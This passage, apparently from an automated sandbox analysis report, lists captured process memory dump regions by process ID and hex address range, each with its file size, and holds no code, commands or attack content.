                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                          • memory/3820-320-0x0000022BADA10000-0x0000022BADA20000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                          • memory/4272-119-0x0000000001280000-0x00000000017CD000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.3MB

                                                                                                                                                                                                                          • memory/4364-193-0x0000000010000000-0x000000001057B000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.5MB

                                                                                                                                                                                                                          • memory/4364-211-0x00000000000C0000-0x00000000007AF000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            6.9MB

                                                                                                                                                                                                                          • memory/4544-168-0x00007FF61A6B0000-0x00007FF61ABF3000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.3MB

                                                                                                                                                                                                                          • memory/4544-354-0x00007FF61A6B0000-0x00007FF61ABF3000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.3MB

                                                                                                                                                                                                                          • memory/4544-326-0x00007FF61A6B0000-0x00007FF61ABF3000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.3MB

                                                                                                                                                                                                                          • memory/4544-205-0x00007FF61A6B0000-0x00007FF61ABF3000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.3MB

                                                                                                                                                                                                                          • memory/4704-138-0x0000000002B20000-0x0000000002F26000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4.0MB

                                                                                                                                                                                                                          • memory/4704-220-0x0000000000400000-0x0000000000D1B000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            9.1MB

                                                                                                                                                                                                                          • memory/4704-158-0x0000000000400000-0x0000000000D1B000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            9.1MB

                                                                                                                                                                                                                          • memory/4704-200-0x0000000000400000-0x0000000000D1B000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            9.1MB

                                                                                                                                                                                                                          • memory/4704-237-0x0000000000400000-0x0000000000D1B000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            9.1MB

                                                                                                                                                                                                                          • memory/4704-109-0x0000000000400000-0x0000000000D1B000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            9.1MB

                                                                                                                                                                                                                          • memory/4704-107-0x0000000002F30000-0x000000000381B000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            8.9MB

                                                                                                                                                                                                                          • memory/4704-328-0x0000000002B20000-0x0000000002F26000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            4.0MB

                                                                                                                                                                                                                          • memory/4908-307-0x0000000000A50000-0x0000000000F9D000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.3MB

                                                                                                                                                                                                                          • memory/4908-79-0x0000000000A50000-0x0000000000F9D000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.3MB

                                                                                                                                                                                                                          • memory/4940-86-0x0000000001280000-0x00000000017CD000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.3MB

                                                                                                                                                                                                                          • memory/4940-196-0x0000000001280000-0x00000000017CD000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.3MB